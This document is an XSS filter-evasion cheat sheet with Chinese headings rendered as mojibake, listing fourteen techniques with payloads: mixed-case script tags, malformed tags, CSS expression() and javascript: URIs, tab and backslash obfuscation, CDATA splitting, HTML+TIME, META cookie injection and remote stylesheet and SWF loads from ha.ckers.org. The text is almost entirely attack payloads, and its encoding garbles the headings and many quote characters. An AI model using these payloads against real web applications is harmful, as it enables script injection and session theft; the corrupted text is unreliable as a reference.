Cross Site Scripting(XSS)¹¥»÷ÊÖ·¨½éÉÜ
1. ¸Ä±ä×Ö·û´óСд<sCript>alert(¡®d¡¯)</scRipT>
2. ÀûÓöà¼ÓһЩÆäËü×Ö·ûÀ´¹æ±ÜRegular ExpressionµÄ¼ì²é
<<script>alert(¡®c¡¯)//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" ¡± SRC="t.js"></SCRIPT>
<SCRIPT "a=¡¯>¡¯" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">¡¯>" SRC="t.js"></SCRIPT>
3. ÒÔÆäËüÀ©Õ¹ÃûÈ¡´ú.js
<script src="bad.jpg"></script>
4. ½«JavascriptдÔÚCSSµµÀï
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
example:
body {
background-image: url(¡®javascript:alert("XSS");¡¯)
}
5. ÔÚscriptµÄtagÀï¼ÓÈëһЩÆäËü×Ö·û
<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. ʹÓÃtab»òÊÇnew lineÀ´¹æ±Ü
<img src="jav ascr ipt:alert(¡®XSS3¡ä)">
<img src="jav ascr ipt:alert(¡®XSS3¡ä)">
<IMG SRC="jav ascript:alert(¡®XSS¡¯);">
-> tag
-> new line
7. ʹÓÃ"\"À´¹æ±Ü
<STYLE>@im\port¡¯\ja\vasc\ript:alert("XSS32")¡¯;</STYLE>
<IMG STYLE=¡¯xss:expre\ssion(alert("XSS33"))¡¯>
<IMG STYLE="xss:expr/*anyword*/ession(alert(¡®sss¡¯))">
<DIV STYLE="width: expre\ssi\on(alert(¡®XSS31¡ä));">
<A STYLE=¡¯no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))¡¯>
8. ʹÓÃHex encodeÀ´¹æ±Ü(Ò²¿ÉÄÜ»á°Ñ";"Äõô)
<DIV STYLE="width: expre\ssi\on(alert(¡®XSS31¡ä));">
ÔʼÂ룺<DIV STYLE="width: expre\ssi\on(alert(¡®XSS31¡ä));">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(¡®abc¡¯);">
ÔʼÂ룺<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(¡®abc¡¯);">
9. script in HTML tag
<body onload=¡¹alert(¡®onload¡¯)¡¹>
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. ÔÚswfÀﺬÓÐxssµÄcode
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. ÀûÓÃCDATA½«xssµÄcode²ð¿ª£¬ÔÙ×éºÏÆðÀ´¡£
<XML ID=I><X><C>
<!]><!]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!¨C ¨C>cript:alert(¡®XSS¡¯)"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. ÀûÓÃHTML+TIME¡£
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. ͸¹ýMETAдÈëCookie¡£
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(¡®XSS¡¯)</SCRIPT>">
14. javascript in src , href , url
<IFRAME SRC=javascript:alert(¡¯13¡ä)></IFRAME>
<img src="javascript:alert(¡®XSS3¡ä)">
<IMG DYNSRC="javascript:alert(¡®XSS20¡ä)">
<IMG LOWSRC="javascript:alert(¡®XSS21¡ä)">
<LINK REL="stylesheet" HREF="javascript:alert(¡®XSS24¡ä);">
<IFRAME SRC=javascript:alert(¡®XSS27¡ä)></IFRAME>
<TABLE BACKGROUND="javascript:alert(¡®XSS29¡ä)">
<DIV STYLE="background-image: url(javascript:alert(¡®XSS30¡ä))">
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(¡®XSS35¡ä)");}
</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert(¡®XSS¡¯);"></FRAMESET>
Ò³:
[1]